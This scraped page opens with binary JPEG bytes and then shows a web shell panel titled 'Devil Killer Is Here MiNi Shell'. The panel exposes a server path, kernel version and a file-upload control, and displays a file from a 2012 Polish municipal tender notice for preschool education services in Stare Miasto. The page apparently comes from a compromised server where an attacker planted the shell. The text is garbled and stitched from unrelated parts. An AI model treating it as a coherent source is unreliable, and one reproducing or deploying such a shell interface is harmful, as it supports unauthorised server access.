JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120302/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120302/64876-N-2012.html

<p class="kh_header"><b>Stare Miasto: Świadczenie usług edukacyjnych obejmujących prowadzenie zajęć opiekuńczych, dydaktycznych i wychowawczych w 3 punktach przedszkolnych utworzonych w ramach projektu pn: Na dobry początek
współfinansowanego ze środków Europejskiego Funduszu Społecznego.</b><br>
<b>Numer ogłoszenia: 64876 - 2012; data zamieszczenia: 02.03.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Stare Miasto , ul. Główna 16b, 62-571 Stare Miasto, woj. wielkopolskie, tel. 063 2416216, faks 063 2416580.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.stare-miasto.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług edukacyjnych obejmujących prowadzenie zajęć opiekuńczych, dydaktycznych i wychowawczych w 3 punktach przedszkolnych utworzonych w ramach projektu pn: Na dobry początek
współfinansowanego ze środków Europejskiego Funduszu Społecznego..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 4.1. 	Przedmiotem zamówienia jest świadczenie usług edukacyjnych obejmujących prowadzenie zajęć opiekuńczych, dydaktycznych i wychowawczych w 3 punktach przedszkolnych utworzonych w ramach projektu pn: Na dobry początek współfinansowanego ze środków Europejskiego Funduszu Społecznego.  
4.2. Usługi będą realizowane w 3 punktach przedszkolnych i podzielone są na następujące zadania: 
część nr 1 - obowiązki nauczyciela-wychowawcy w punkcie przedszkolnym w Kazimierowie, gmina Stare Miasto:
zakres zadania:  realizację zajęć opiekuńczych, wychowawczych i dydaktycznych zgodnie                      z podstawą programową wychowania przedszkolnego, (dzieci w wieku 3-5 lat - 1 grupa około 15 osobowa) - szczegółowy zakres zadania określony jest we wzorcowej umowie stanowiącej załącznik nr  4.1  do SIWZ 
okres realizacji usługi: od 1 kwietnia 2012 r. do 28 lutego 2014 r. (z wyłączeniem  lipca 2012 r. oraz lipca 2013 r.),  punkt przedszkolny funkcjonujący 25 h tygodniowo (5 h dziennie)

część nr 2 - obowiązki pomocy nauczyciela w punkcie przedszkolnym w Kazimierowie                   gmina Stare Miasto:
zakres zadania:  wsparcie nauczyciela przy realizacji  zajęć opiekuńczych, wychowawczych i dydaktycznych zgodnie  z podstawą programową wychowania przedszkolnego, (dzieci w wieku 3-5 lat - 1 grupa około 15 osobowa) - szczegółowy zakres zadania określony jest we wzorcowej umowie stanowiącej załącznik nr  4.2  do SIWZ 
okres realizacji usługi: od 1 kwietnia 2012 r. do 28 lutego 2014 r. (z wyłączeniem  lipca 2012 r. oraz lipca 2013 r.),  punkt przedszkolny funkcjonujący 25 h tygodniowo,   dodatkowo 1 h dziennie na utrzymanie pomieszczeń w należytym porządku - łącznie 30 h tygodniowo (6 h dziennie)

część nr 3 - obowiązki nauczyciela-wychowawcy w punkcie przedszkolnym w Ruminie, gmina Stare Miasto:
zakres zadania:  realizację zajęć opiekuńczych, wychowawczych i dydaktycznych zgodnie                      z podstawą programową wychowania przedszkolnego, (dzieci w wieku 3-5 lat - 1 grupa około 15 osobowa) - szczegółowy zakres zadania określony jest we wzorcowej umowie stanowiącej załącznik nr  4.1  do SIWZ 
okres realizacji usługi: od 1 kwietnia 2012 r. do 28 lutego 2014 r. (z wyłączeniem  lipca 2012 r. oraz lipca 2013 r.),  punkt przedszkolny funkcjonujący 25 h tygodniowo (5 h dziennie)


część nr 4 - obowiązki pomocy nauczyciela w punkcie przedszkolnym w Ruminie,                  gmina Stare Miasto:
zakres zadania:  wsparcie nauczyciela przy realizacji  zajęć opiekuńczych, wychowawczych i dydaktycznych zgodnie  z podstawą programową wychowania przedszkolnego, (dzieci w wieku 3-5 lat - 1 grupa około 15 osobowa) - szczegółowy zakres zadania określony jest we wzorcowej umowie stanowiącej załącznik nr  4.2  do SIWZ 
okres realizacji usługi: od 1 kwietnia 2012 r. do 28 lutego 2014 r. (z wyłączeniem  lipca 2012 r. oraz lipca 2013 r.),  punkt przedszkolny funkcjonujący 25 h tygodniowo,   dodatkowo 1 h dziennie na utrzymanie pomieszczeń w należytym porządku - łącznie 30 h tygodniowo (6 h dziennie)

część nr 5 - obowiązki nauczyciela-wychowawcy w punkcie przedszkolnym w Żdzarach , gmina Stare Miasto:
zakres zadania:  realizację zajęć opiekuńczych, wychowawczych i dydaktycznych zgodnie                      z podstawą programową wychowania przedszkolnego, (dzieci w wieku 3-5 lat - 1 grupa około 15 osobowa) - szczegółowy zakres zadania określony jest we wzorcowej umowie stanowiącej załącznik nr  4.1  do SIWZ 
okres realizacji usługi: od 1 kwietnia 2012 r. do 28 lutego 2014 r. (z wyłączeniem  lipca 2012 r. oraz lipca 2013 r.),  punkt przedszkolny funkcjonujący 25 h tygodniowo (5 h dziennie)

część nr 6 - obowiązki pomocy nauczyciela w punkcie przedszkolnym w Żdżarach                  gmina Stare Miasto:
zakres zadania:  wsparcie nauczyciela przy realizacji  zajęć opiekuńczych, wychowawczych i dydaktycznych zgodnie  z podstawą programową wychowania przedszkolnego, (dzieci w wieku 3-5 lat - 1 grupa około 15 osobowa) - szczegółowy zakres zadania określony jest we wzorcowej umowie stanowiącej załącznik nr  4.2  do SIWZ 
okres realizacji usługi: od 1 kwietnia 2012 r. do 28 lutego 2014 r. (z wyłączeniem  lipca 2012 r. oraz lipca 2013 r.),  punkt przedszkolny funkcjonujący 25 h tygodniowo,   dodatkowo 1 h dziennie na utrzymanie pomieszczeń w należytym porządku - łącznie 30 h tygodniowo (6 h dziennie)

część nr 7 - zajęcia gimnastyki korekcyjnej w punktach przedszkolnych w Kazimierowie,  Ruminie,  Żdzarach,  w gminie Stare Miasto:
zakres zadania:  prowadzenie zajęć gimnastyki korekcyjnej dla dzieci w wieku 3-5 lat objętych projektem - szczegółowy zakres zadania określony jest we wzorcowej umowie stanowiącej załącznik nr  4.3  do SIWZ 
okres realizacji usługi: od 1 kwietnia 2012 r. do 28 lutego 2014 r. (z wyłączeniem  lipca 2012 r., lipca 2013 r. oraz sierpnia 2013),  
zakres usługi: zajęcia realizowane dla 3 grup przedszkolnych w Kazimierowie, Ruminie oraz Żdżarach, 80 h na grupę (160 spotkań  po 30 minut, 2 razy w tygodniu),  łącznie 240 h zajęć  

część nr 8 - zajęcia języka angielskiego w punktach przedszkolnych w Kazimierowie,  Ruminie,  Żdzarach,  w gminie Stare Miasto:
zakres zadania:  prowadzenie zajęć języka angielskiego dla dzieci w wieku 3-5 lat objętych projektem - szczegółowy zakres zadania określony jest we wzorcowej umowie stanowiącej załącznik nr  4.4  do SIWZ 
okres realizacji usługi: od 1 kwietnia 2012 r. do 28 lutego 2014 r. (z wyłączeniem  lipca 2012 r., lipca 2013 r. oraz sierpnia 2013),  
zakres usługi: zajęcia realizowane dla 3 grup przedszkolnych w Kazimierowie, Ruminie oraz Żdżarach, 80 h na grupę (160 spotkań  po 30 minut, 2 razy w tygodniu),  łącznie 240 h zajęć  

część nr  9 - zajęcia logopedyczne  w punktach przedszkolnych w Kazimierowie,  Ruminie,  Żdzarach,  w gminie Stare Miasto:
zakres zadania:  prowadzenie zajęć logopedycznych dla dzieci w wieku 3-5 lat objętych projektem - szczegółowy zakres zadania określony jest we wzorcowej umowie stanowiącej załącznik nr  4.5  do SIWZ 
okres realizacji usługi: od 1 kwietnia 2012 r. do 28 lutego 2014 r. (z wyłączeniem  lipca 2012 r., lipca 2013 r. oraz sierpnia 2013),  
zakres usługi: zajęcia realizowane dla 3 grup przedszkolnych w Kazimierowie, Ruminie oraz Żdżarach, 40 h na grupę (80 spotkań  po 30 minut, 1 raz w tygodniu),  łącznie 120 h zajęć  

część nr 10 - zajęcia psychologiczne  w punktach przedszkolnych w Kazimierowie,  Ruminie,  Żdzarach,  w gminie Stare Miasto:
zakres zadania:  prowadzenie zajęć psychologicznych  dla dzieci w wieku 3-5 lat objętych projektem - szczegółowy zakres zadania określony jest we wzorcowej umowie stanowiącej załącznik nr  4.6 do SIWZ 
okres realizacji usługi: od 1 kwietnia 2012 r. do 28 lutego 2014 r. (z wyłączeniem  lipca 2012 r., lipca 2013 r. oraz sierpnia 2013),  
zakres usługi: zajęcia realizowane dla 3 grup przedszkolnych w Kazimierowie, Ruminie oraz Żdżarach, 40 h na grupę (80 spotkań  po 30 minut, 1 raz w tygodniu),  łącznie 120 h zajęć.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 10.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 28.02.2014.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca: 
- wykaże, że posiada wpis do Rejestru Instytucji Szkoleniowych prowadzonego przez wojewódzki urząd pracy właściwy ze względu na siedzibę instytucji szkoleniowej - art. 20 ustawy z dn. 20 kwietnia 2004 r. o promocji zatrudnienia i instytucjach rynku pracy (Dz.U. z 2008 r. Nr 69, poz. 415 z póź. zm.) - dotyczy tylko instytucji szkoleniowych;
- przedłoży oświadczenie o spełnieniu warunków udziału w postępowaniu (załącznik nr 2 do SIWZ).
Przy dokonaniu oceny spełnienia warunku Zamawiający będzie się kierował regułą: spełnia albo nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca posiada wiedzę i doświadczenie, jeżeli:
- wykonawca usługi dołączy odpowiednie dokumenty potwierdzające wykształcenie:
Do części zamówienia  nr  1,  3,  5 wymagane  jest  posiadanie wykształcenia wyższego magisterskiego o kierunku nauczyciel wychowania przedszkolnego lub edukacji wczesnoszkolnej.
Do części zamówienia nr 2, 4, 6 wymagane jest posiadanie wykształcenia zasadniczego. 
Do części zamówienia nr 7, 8, 9, 10 wymagane jest posiadanie wykształcenia wyższego                                     o kierunku/specjalności  odpowiadającym zakresowi realizowanych zajęć lub ukończeniu studiów podyplomowych o kierunku/specjalności  odpowiadającym zakresowi realizowanych zajęć. Ponadto min. 2-letnie doświadczenie w pracy z dziećmi w wieku przedszkolnym(udokumentowane); udział w min. 1  projekcie  EFS w funkcji  zgodnej                       z zakresem zajęć w ofercie, którego celem była praca z dziećmi w wieku przedszkolnym(udokumentowane).
Przy dokonaniu oceny spełnienia warunku Zamawiający będzie się kierował regułą: spełnia albo nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony na podstawie złożonego przez Wykonawcę oświadczenia o spełnianiu warunków udziału w postępowaniu zgodnie z art. 22 ust 1 ustawy - Prawo zamówień publicznych (załącznik nr 2 do SIWZ).
Przy dokonaniu oceny spełnienia warunku Zamawiający będzie się kierował regułą: spełnia albo nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony na podstawie złożonego przez Wykonawcę oświadczenia o spełnianiu warunków udziału w postępowaniu zgodnie z art. 22 ust 1 ustawy - Prawo zamówień publicznych (załącznik nr 2 do SIWZ).
Przy dokonaniu oceny spełnienia warunku Zamawiający będzie się kierował regułą: spełnia albo nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony na podstawie złożonego przez Wykonawcę oświadczenia o spełnianiu warunków udziału w postępowaniu zgodnie z art. 22 ust 1 ustawy - Prawo zamówień publicznych (załącznik nr 2 do SIWZ).
Przy dokonaniu oceny spełnienia warunku Zamawiający będzie się kierował regułą: spełnia albo nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wypełniony formularz ofertowy stanowiący Załącznik Nr 1 do niniejszej specyfikacji.
Uwaga: W przypadku składania oferty na kilka części, Wykonawca składa wypełniony formularz oferty odrębnie dla każdej części zamówienia.
2. Zaakceptowany projekt umowy stanowiący załącznik nr 4.1 do 4.6 do SIWZ
3.Pełnomocnictwa do podpisania oferty (w przypadku gdy Wykonawcę reprezentuje Pełnomocnik, do oferty należy dołączyć pełnomocnictwo w formie oryginału lub kserokopii poświadczonej przez notariusza).
4.Kserokopię dokumentu potwierdzającego spełnienie warunków dotyczących wykształcenia określonych w punkcie 5.1.2 
5.Zaświadczenie o wpisie instytucji szkoleniowej do rejestru instytucji szkoleniowych wydawane przez Wojewódzki Urząd Pracy właściwy ze względu na siedzibę instytucji szkoleniowej (Rozporządzenie Ministra Gospodarki i Pracy z dnia 27 października 2004 r. w sprawie rejestru instytucji szkoleniowych Dz. U. nr 236, poz. 2365) NIE DOTYCZY OSÓB FIZYCZNYCH
6.Oświadczenie mówiące o tym, że zaświadczenie o wpisie do instytucji szkoleniowej do rejestru instytucji szkoleniowej wydawane przez Wojewódzki Urząd pracy jest aktualne w roku bieżącym tj. 2012, co jest jednoznaczne z tym, iż Wykonawca w roku bieżącym nadal prowadzi działalność szkoleniową (dołączyć w przypadku, gdy dokument wskazany w pkt. 6.1.6. jest nieaktualny) NIE DOTYCZY OSÓB FIZYCZNYCH
7.pisemne zobowiązanie podmiotów do oddania do dyspozycji Wykonawcy  niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia gdy Wykonawca polega na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków -  tylko w przypadku, gdy Wykonawca samodzielnie nie dysponuje osobami, które będą uczestniczyć  w wykonywaniu zamówienia - wg wzoru - załącznik nr 5 do SIWZ</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>2. Zgodnie z postanowieniami art. 144 ust. 1 ustawy Prawo zamówień publicznych Zamawiający przewiduje możliwość dokonania zmian w umowie o udzielenie zamówienia publicznego po jej zawarciu, pod warunkiem podpisania stosownego aneksu. Zmiany te zgodnie z zapisami art. 140 ust. 3 ustawy Prawo zamówień publicznych nie mogą wykraczać poza określenie przedmiotu zamówienia zawartego w SIWZ.
3. Zmiana postanowień zawartej Umowy może nastąpić wyłącznie za zgodą obu stron wyrażoną na  piśmie pod rygorem nieważności.
4. W szczególności, Zamawiający dopuszcza:
a) aktualizację danych Wykonawcy i Zamawiającego poprzez: zmianę nazwy firmy, zmianę adresu siedziby, zmianę formy prawnej itp.,
b) zmianę ustalonych terminów płatności.

2. Zamawiający dopuszcza możliwość zmiany umowy w następujących przypadkach, gdy:   
- z powodu uzasadnionych zmian w zakresie sposobu wykonania przedmiotu zamówienia 
proponowanych przez zamawiającego lub wykonawcę , jeżeli te zmiany są korzystne dla zamawiającego.
- z powodu okoliczności siły wyższej np. wystąpienia zdarzenia losowego wywołanego przez czynniki zewnętrzne, którego nie można było przewidzieć. 
- z powodu działań osób trzecich uniemożliwiających wykonanie prac, które to działania nie są konsekwencją winy którejkolwiek ze stron.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.stare-miasto.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gmina Stare Miasto
Ul. Główna 16b
62-571 Stare Miasto.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.03.2012 godzina 10:00, miejsce: Gmina Stare Miasto
Ul. Główna 16b
62-571 Stare Miasto 
(sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> PROGRAM OPERACYJNY KAPITAŁ LUDZKI, DZIAŁANIE 9.1, PODDZIAŁANIE 9.1.1..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> część nr 1 - obowiązki nauczyciela-wychowawcy w punkcie przedszkolnym w Kazimierowie, gmina Stare Miasto:.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> zakres zadania:  realizację zajęć opiekuńczych, wychowawczych i dydaktycznych zgodnie                      z podstawą programową wychowania przedszkolnego, (dzieci w wieku 3-5 lat - 1 grupa około 15 osobowa) - szczegółowy zakres zadania określony jest we wzorcowej umowie stanowiącej załącznik nr  4.1  do SIWZ 
okres realizacji usługi: od 1 kwietnia 2012 r. do 28 lutego 2014 r. (z wyłączeniem  lipca 2012 r. oraz lipca 2013 r.),  punkt przedszkolny funkcjonujący 25 h tygodniowo (5 h dziennie).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.02.2014.</p></li>
